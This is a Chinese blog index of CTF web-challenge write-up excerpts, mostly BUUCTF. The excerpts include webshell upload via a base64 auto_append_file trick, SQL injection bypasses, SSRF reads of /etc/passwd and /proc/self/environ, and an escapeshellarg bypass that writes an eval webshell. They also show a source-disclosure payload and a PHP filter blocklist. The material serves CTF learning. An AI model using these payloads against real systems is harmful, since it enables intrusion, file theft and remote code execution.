2026年8月6日

CTF2-funny_upload

摘要: 踩坑点: 上传shell.png的时候,是<二进制图片数据>+base64编码后的木马 这样当php_value auto_append_file "php://filter/convert.base64-decode/resource=1.jpg"发力的时候,base64decode的是二进制图片 阅读全文

posted @ 2026-08-06 22:49 misaki%20mei 阅读(10) 评论(0) 推荐(0)

2026年8月5日

CTF2-multiSQL

摘要: 听说火华师傅四级又挂掉了,他不好给他的英语老师交代,你能帮他改改成绩通过学校的验证嘛~ 这题的目的很明确,就是修改分数使其>425 fuzz发现如下关键词被禁用: union select set insert 我们使用replace into语法代替insert语法插入,replace into语 阅读全文

posted @ 2026-08-05 09:35 misaki%20mei 阅读(10) 评论(0) 推荐(0)

2026年7月26日

更深入的认识OR 1=1

摘要: OR 1=1 的本质是一个永真条件,它通过逻辑“或”运算让整个 WHERE 子句恒为真。 深入理解: 在 SQL 中,WHERE 子句就像一个过滤器:它会逐行检查表中的数据,只有满足条件的行才会被放入结果集。 正常查询: SELECT * FROM users WHERE username = 'a 阅读全文

posted @ 2026-07-26 02:40 misaki%20mei 阅读(29) 评论(0) 推荐(0)

2026年4月11日

BUU-[网鼎杯 2020 白虎组]PicDown

摘要: 题目给的是GET参数名为url,应该就是SSRF的题目 输入?url=/etc/passwd 回显成功, 证实了是SSRF 接着, 查看进程变量 ?url=/proc/self/environ MAIL=/var/mail/app USER=app HOME=/home/app LOGNAME=ap 阅读全文

posted @ 2026-04-11 13:30 misaki%20mei 阅读(11) 评论(0) 推荐(0)

2026年4月5日

BUU-[红明谷CTF 2021]write_shell

摘要: ```php function check($input) { if (preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i", $input)) { // if(preg_match("/'| |_|=|php/",$input)){ die('hacker! 阅读全文

posted @ 2026-04-05 18:31 misaki%20mei 阅读(7) 评论(0) 推荐(0)

2026年1月31日

BUU-[CISCN 2019 初赛]Love Math

摘要: preg_match_all()函数 . 真实的执行逻辑:指针移动 preg_match_all 不会修改你的原字符串 $content。它的逻辑是这样的: 初始状态:指针指向字符串的开头(位置 0)。 寻找匹配:从指针位置开始往后找,直到发现符合正则的内容。 捕获内容:一旦匹配成功(比如抓到了 e 阅读全文

posted @ 2026-01-31 21:20 misaki%20mei 阅读(12) 评论(0) 推荐(0)

2026年1月30日

BUU-[SWPU2019]Web1

摘要: 无列名查询 (select/**/group_concat(a)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)x) =>解析 union查询的特点: 1. 要求两 阅读全文

posted @ 2026-01-30 22:03 misaki%20mei 阅读(10) 评论(0) 推荐(0)

2026年1月28日

BUU-[GXYCTF2019]禁止套娃

摘要: 强烈推荐: 讲的非常直白 我的笔记: payload: highlight_file(next(array_reverse(scandir(current(localeconv()))))) <?php //var_dump( highlight_file(next(array_reverse(sc 阅读全文

posted @ 2026-01-28 00:00 misaki%20mei 阅读(39) 评论(0) 推荐(0)

2026年1月27日

BUU-[BUUCTF 2018]Online Tool

摘要: //escapeshellarg()函数的处理流程, 为单引号转义,并且使用单引号包围;而且会为目标前后添加一对单引号 //' <?php eval($_GET[pass]); -oG shell.php ' 原始payload //''\'' <?php eval($_GET[pass]); -o 阅读全文

posted @ 2026-01-27 13:32 misaki%20mei 阅读(13) 评论(0) 推荐(0)

2026年1月26日

BUU-[BJDCTF2020]ZJCTF,不过如此

摘要: //next.php <?php $id = $_GET['id']; $_SESSION['id'] = $id; function complex($re, $str) { return preg_replace( '/(' . $re . ')/ei', 'strtolower("\\1")' 阅读全文

posted @ 2026-01-26 20:52 misaki%20mei 阅读(6) 评论(0) 推荐(0)

导航